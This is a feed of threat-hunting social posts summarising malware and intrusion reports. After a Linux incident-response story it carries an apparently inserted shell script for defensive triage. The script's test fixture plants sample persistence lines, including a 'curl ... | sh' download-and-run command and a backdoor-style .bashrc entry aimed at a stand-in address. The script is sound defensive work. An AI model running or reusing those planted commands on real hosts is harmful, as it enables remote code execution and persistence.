#threatHunting

Phillemon CEH | CTHwardenshield
2025-06-14

πŸ›‘οΈ Meet the WardenShield MS9: Your Ultimate Malware Scanner πŸ¦ βš”οΈ
Say goodbye to hidden threats and hello to powerful protection.

👉 Learn more:
🔗 wardenshield.com/wardenshield-

Overture Rede Private LimitedOvertureRede
2025-06-13

🚀 Position: Security Engineer
📍 Location: Chennai
🧠 Experience: 2-5 years

📩 Apply: resumes@overturerede.zohorecruitmail.in
📞 Contact: 9582224661

Just Another Blue TeamerLeeArchinal@ioc.exchange
2025-06-11

Happy Wednesday everyone!

A "fully undetected #infostealer malware sample written in Rust" was identified by Trellix researchers while conducting a proactive hunt! The distribution should not come as any surprise, fraudulent gaming websites! This is not an old tactic and something that I have read about from many vendors (Remember, downloading cracked or "free" games from sites normally means you just aren't paying with money!). In this case, the "game" files were distributed as password-protected rar files which contained the stealer executable with some legitimate game-related files. This is another tactic that is commonly used to "assure" the user that they downloaded something legitimate.

The researchers also discussed the capabilities of the malware and here are just a few:
- It displayed a fake window to the user to fool them into it being a legitimate application.
- It terminates a list of processes, some that relate to browsers.
- Steals passwords, cookies, autofills, and saved credit card information from applications like Discord and Chrome.
- Drops a copy of itself in the \AppData\Roaming directory and saves a .lnkk file in the startup directory for persistence. The attackers link the executable and the .lnkk through registry keys so it can execute the .exe file properly.

Thanks go to the researchers (who, if you want tagged in here, let me know!) for the great report and details! I hope you enjoy the read as much as I did and go check out the details I left out, it's worth it! Happy Hunting!

Demystifying Myth Stealer: A Rust Based InfoStealer
trellix.com/en-in/blogs/resear

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Just Another Blue TeamerLeeArchinal@ioc.exchange
2025-06-10

Good day everyone!

This is a really interesting read from SentinelOne Labs. Back in October 2024 they dealt with a reconnaissance operation that was related to the activity cluster tracked as #PurpleHaze and then in 2025 "they helped disrupt an intrusion linked to a wider #ShadowPad operation". The activity was attributed to China-nexus threat actors.

The article gives an in-depth view of what it looks like when an organization that is responsible for "IT services and logistics" gets compromised, which we could call a supply-chain attack. The article also provides a TON of technical details about tools and infrastructure that were used, indicators of compromise to scan for in your environment, and behaviors and commands that were observed throughout. This one may take a while to read but it's worth it! Thanks to the researchers Dr Aleksandar Milenkoski and Tom Hegel for this report! I hope you all enjoy it as much as I did. Happy Hunting!

Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets
sentinelone.com/labs/follow-th

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

2025-06-10

👀 Threat detected? Slipper deployed.

In cybersecurity, just like at mom’s house:
If it moves funny, it gets neutralized before it hits the floor. 🩴💨

#threathunting

2025-06-10

🎉 Just dropped a new Kunai release! 🎉

We've been working hard on some exciting new features and performance boosts that we can't wait for you to try out! Here's what's new:

New Features:
πŸ” Track io_uring operations with new io_uring_sqe events!
πŸ“ Get more context with parent command line information for execve and execve_script events.
πŸ”Ž Get information about matching filtering rules in final events.
πŸ§ͺ Test your filters with ease using the new test command.

Improvements:
⚡ Experience performance boosts thanks to changes in the event matching engine and code refactoring.

Ready to dive in? Check out the full release notes here: github.com/kunai-project/kunai

Don't hesitate to give Kunai a try and share your feedback! Let's make Kunai even better together!

#Linux #ThreatHunting #ThreatDetection #DFIR #DetectionEngineering #OpenSource

2025-06-10

OtterCookie is a stealer malware linked to North Korea’s Lazarus Group. It targets tech, finance, and crypto professionals through fake interviews and uses obfuscated JavaScript to steal credentials and wallets 🕵️‍♂️

any.run/cybersecurity-blog/ott

#infosec #cybersecurity #malware #threatintel #threathunting

Just Another Blue TeamerLeeArchinal@ioc.exchange
2025-06-09

Happy Monday Everyone!

Researchers at Cisco Talos "observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “#PathWiper”". The article states "The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across connected endpoints".

The researchers also provided technical details, some IOCs, capabilities of the wiper, and some hints at behaviors. In this incident a batch (BAT) file was dropped on the compromised machine and ran a command that leveraged WScript.exe to execute a VBScript (uacinstall.vbs) from the C:\Windows\Temp\ directory. After the execution, the PathWiper executable appears in the C:\Windows\Temp\ directory with the name of "sha256sum.exe". So assuming this is how the malware or actor operates, you can hunt for new scripting files or executables in the C:\Windows\Temp directory. Now this is not a foolproof method as behaviors can change, but it could be a great start when hunting for this threat! Thank you to the researchers and I hope you enjoy the article! Happy Hunting!

Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine
blog.talosintelligence.com/pat

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Just Another Blue TeamerLeeArchinal@ioc.exchange
2025-06-05

Good day everyone!

As you know I am a big advocate for threat hunting and I like to post the articles that I read related to it, but there is a bigger picture that I normally leave out because of my perspective. As a threat hunter I like to look at behaviors and artifacts (Indicators of Attack) and the MITRE ATT&CK Matrix, but something I should probably start talking more about is the overall picture of the Threat Hunting Life-cycle. Really, this was brought about because of the joint advisory that the Cybersecurity and Infrastructure Security Agency and the Federal Bureau of Investigation (FBI), as well as the Australian Government, released on #Play Ransomware. This isn't the first time that I have read it and hopefully won't be the last, simply because of these couple of lines:

"June 4, 2025: The advisory was updated to reflect new TTPs employed by Play ransomware group, as well as provide current IOCs/remove outdated IOCs for effective threat hunting." Above it they mention that the original advisory was published on December 18, 2023, but the fact that they are returning to these and updating them with new TTPs and providing new IOCs is a GREAT example of the Threat Hunting Life-cycle.

So if you do have a threat hunting program in your environment, maybe implement something similar for your hunts if you haven't done so already. Revisit the hunts that have been conducted already in your environment and see if the information within is still current and, if not, update it accordingly! Have a wonderful day and Happy Hunting!

#StopRansomware: Play Ransomware
cisa.gov/news-events/cybersecu

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #ransomware #readoftheday

@phoenixx You might well have that in your list already, but I would include also /var/spool/cron (particularly /var/spool/cron/atjobs) in the list of directories to check for signs of persistence.

#Linux #IncidentResponse #BlueTeam #forensics #ITForensics #ComputerForensics #infosec #ThreatHunting

Just Another Blue TeamerLeeArchinal@ioc.exchange
2025-06-03

Good day everyone!

If you are interested in Threat Hunting and happen to be at the SANS Institute DFIR Summit in Utah, Arun Warikoo and I will be discussing when to use structured and unstructured hunts and what that would look like! I look forward to it and hope to meet a ton of new people! Have a wonderful day and Happy Hunting!

DFIR Summit & Training 2025
sans.org/cyber-security-traini

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

2025-06-03

Okay, so I wanted to share a little incident from a few months back that really hammered home the power of knowing your Linux internals when things go sideways. I got a frantic call, "something weird is going on with our build server, it's acting sluggish and our monitoring is throwing odd network alerts." No fancy EDR on this particular box, just the usual ssh and bash. My heart always sinks a little when it's a Linux box with vague symptoms, because you know it's time to get your hands dirty.

First thing I did, even before reaching for any specific logs, was to get a quick snapshot of the network. Instead of netstat, which honestly feels a bit dated now, I immediately hit ss -tunap. That p is crucial because it shows you the process and user ID for each connection. What immediately jumped out was an outbound TCP connection on a high port to a sketchy-looking IP, and it was tied to a process that definitely shouldn't have been making external calls. My gut tightened. I quickly followed up with lsof -i just to be super sure no deleted binaries were clinging on to network connections.

With that IP and PID in hand, I moved to process investigation. pstree -ap was my next stop. It showed the suspicious process, and more importantly, its parent. It wasn't a child of systemd or a normal service. It was spawned by a build script that shouldn't have been executing anything like this. That hierarchical view was key. Then, to really understand what this thing was doing, I dared to strace -p <PID>. Watching the system calls unfurl was like watching a movie of its malicious intent: it was reading from /etc/passwd, making connect() calls, and trying to write to some odd /tmp directories. Simultaneously, I checked ls -l /proc/<PID>/exe to confirm the actual binary path (it was indeed in /tmp) and /proc/<PID>/cwd to see its working directory. No doubt, this was a rogue process.

Knowing it was a fresh infection, I immediately shifted to the filesystem. My go-to is always find / -type f -newermt '2 days ago' -print0 | xargs -0 ls -latr. This quickly pulls up any files modified in the last 48 hours, sorted by modification time. It's often where you find dropped payloads, modified configuration files, or suspicious scripts. Sure enough, there were a few more binaries in /tmp and even a suspicious .sh script in a developer's home directory. I also scanned for SUID/SGID binaries with find / -perm /6000 just in case they'd dropped something for privilege escalation. And while stat's timestamps can be tampered with, I always glance at atime, mtime, and ctime on suspicious files; sometimes, a subtle mismatch offers a tiny clue if the attacker wasn't meticulous.

The final piece of the puzzle, and often the trickiest, is persistence. I checked the usual suspects: crontab -l for root and every other user account I could find. Then I cast a wider net with grep -r "suspect_domain_or_ip" /etc/cron.* /etc/systemd/system/ /etc/rc.d/ and similar common boot directories. Sure enough, a new systemd timer unit had been added that was scheduled to execute the /tmp binary periodically. Finally, I didn't forget the user dotfiles (~/.bashrc, ~/.profile, etc.). It’s surprising how often an attacker will drop a malicious alias or command in there, assuming you won't dig deep into a developer's setup.

Long story short, we quickly identified the ingress vector, isolated the compromise, and cleaned up the persistence. But what really stuck with me is how quickly you can triage and understand an incident if you're comfortable with these fundamental Linux commands. There's no substitute for getting your hands dirty and really understanding what strace is showing you or why ss is superior to netstat in a high-pressure situation. These tools are your best friends in a firefight.

#linux #incidentresponse #blueteam #forensics #shell #bash #sysadmin #infosec #threathunting #lessonslearned
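The triage walkthrough above (ss -tunap, /proc inspection, recent-file and SUID sweeps, then the persistence grep) and the earlier reply about adding /var/spool/cron to the persistence checklist describe one procedure. The script below is an added example, not code from either poster: it turns those steps into small shell functions that can be tested offline. The suspect peer 203.0.113.10 (a documentation-range address), the process names, and the sample ss output are constructed test data, not indicators from any report.

```sh
#!/bin/sh
# Added example: offline-testable helpers for the Linux triage steps in the post.
# 203.0.113.10, the PIDs, process names and the ss sample below are constructed.
set -u

SUSPECT="203.0.113.10"

# Constructed sample of `ss -tunap` output (columns follow iproute2's layout:
# Netid State Recv-Q Send-Q Local:Port Peer:Port Process).
SAMPLE_SS='Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   ESTAB  0      0      10.0.0.5:22        10.0.0.9:51244    users:(("sshd",pid=812,fd=4))
tcp   ESTAB  0      0      10.0.0.5:44210     203.0.113.10:4444 users:(("sh",pid=2231,fd=3))
tcp   LISTEN 0      128    0.0.0.0:8080       0.0.0.0:*         users:(("node",pid=1500,fd=19))
udp   UNCONN 0      0      0.0.0.0:68         0.0.0.0:*         users:(("dhclient",pid=600,fd=6))'

# Read `ss -tunap` output on stdin; print "pid name peer" for every established
# connection whose peer is outside loopback and RFC 1918 space (IPv4 only).
# Live usage:  ss -tunap | external_peers
external_peers() {
    awk '
        NR == 1 { next }                        # column header
        $2 != "ESTAB" { next }                  # only live TCP sessions
        {
            peer = $6; sub(/:[^:]*$/, "", peer) # drop :port
            if (peer ~ /^127\./ || peer ~ /^10\./ || peer ~ /^192\.168\./) next
            if (peer ~ /^172\.(1[6-9]|2[0-9]|3[01])\./) next
            name = ""; pid = ""
            if (match($7, /\("[^"]+"/)) name = substr($7, RSTART + 2, RLENGTH - 3)
            if (match($7, /pid=[0-9]+/))  pid  = substr($7, RSTART + 4, RLENGTH - 4)
            print pid, name, peer
        }'
}

# Where a live PID really runs from: binary path (readlink appends " (deleted)"
# if the file is gone, the lsof -i case from the post) and working directory.
proc_origin() {
    printf 'exe=%s cwd=%s\n' \
        "$(readlink "/proc/$1/exe" 2>/dev/null || echo '?')" \
        "$(readlink "/proc/$1/cwd" 2>/dev/null || echo '?')"
}

# Files under $1 modified within the last $2 days, oldest first. The post used
# GNU find's -newermt '2 days ago'; -mtime is the portable equivalent.
recent_files() {
    find "$1" -type f -mtime "-$2" -exec ls -ltr {} +
}

# SUID/SGID files under $1 (the post's find / -perm /6000, in POSIX form).
find_suid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \)
}

# Persistence sweep: the post's grep over cron/systemd/rc dirs, widened with
# /var/spool/cron (per the reply) and user dotfiles. $1 = filesystem root
# (/ on a live host, or a mounted image), $2 = IOC string. Prints matching files.
hunt_persistence() {
    root=$1; ioc=$2
    grep -rlF -- "$ioc" \
        "$root/etc/crontab" "$root/etc/cron.d" "$root/etc/cron.hourly" "$root/etc/cron.daily" \
        "$root/etc/systemd/system" "$root/etc/rc.d" "$root/etc/init.d" \
        "$root/var/spool/cron" \
        "$root"/home/*/.bashrc "$root"/home/*/.profile "$root"/home/*/.bash_profile \
        "$root/root/.bashrc" 2>/dev/null | sort
}

# Throwaway tree that mimics those locations with planted artefacts (all
# constructed). Prints the root so callers can sweep and then rm -rf it.
build_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/cron.d" "$root/etc/systemd/system" \
             "$root/var/spool/cron/atjobs" "$root/home/dev"
    printf '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n' > "$root/etc/cron.d/logrotate"
    printf '[Service]\nExecStart=/tmp/.cache-x -c %s:4444\n' "$SUSPECT" > "$root/etc/systemd/system/cache-x.service"
    printf '[Timer]\nOnUnitActiveSec=10min\n' > "$root/etc/systemd/system/cache-x.timer"
    printf 'curl -s http://%s/p | sh\n' "$SUSPECT" > "$root/var/spool/cron/atjobs/a00001019f3c2a"
    printf 'alias ls="ls --color=auto"\nnohup /tmp/.cache-x -c %s >/dev/null 2>&1 &\n' "$SUSPECT" > "$root/home/dev/.bashrc"
    echo "$root"
}

# Stand-alone demo on the constructed data; point the functions at / on a live host.
printf '%s\n' "$SAMPLE_SS" | external_peers
FIXTURE=$(build_fixture)
hunt_persistence "$FIXTURE" "$SUSPECT"
rm -rf "$FIXTURE"
```

On a real box run the sweep as root with the root set to / (or to the mount point of an image), and note that grep only finds persistence that names the indicator; a timer unit that calls a renamed binary still needs the manual review of new unit files and cron entries the post describes.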

Just Another Blue TeamerLeeArchinal@ioc.exchange
2025-06-02

Happy Monday everyone!

The Google Threat Intel Group (GTIP) discovered that a government website was hosting malware being used to target multiple other government entities and, with high confidence, attributed the activity to #APT41 (a.k.a. HOODOO). The group used a piece of malware dubbed #Toughprogress which executes on the compromised host and uses Google Calendar for command-and-control (C2) communications. The initial access vector was a spear-phishing email that contained a link to a ZIP file which held an LNK masquerading as a PDF, and a directory, which all played their part in the attack. This was a great read and I hope you enjoy it too! Happy Hunting!

Mark Your Calendar: APT41 Innovative Tactics
cloud.google.com/blog/topics/t

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

2025-06-02

Is anyone familiar with this kind of file name? Looks like it's generated from some sort of C2 framework but I'm not sure what. #threathunting

2025-06-01

Maintaining motivation for threat hunts is hard when you're on a long streak of nothing found or simply can't do because of "limitations." It might be easier to flip the scope to what do "I" want to learn and turn that into a hunt.
#ThreatHunting

2025-05-29

This blog is a little bitter, but it's what it is 🫠

Detecting Vulnerable Drivers (a.k.a. LOLDrivers) the Right Way

academy.bluraven.io/blog/detec

#ThreatHunting #DetectionEngineering
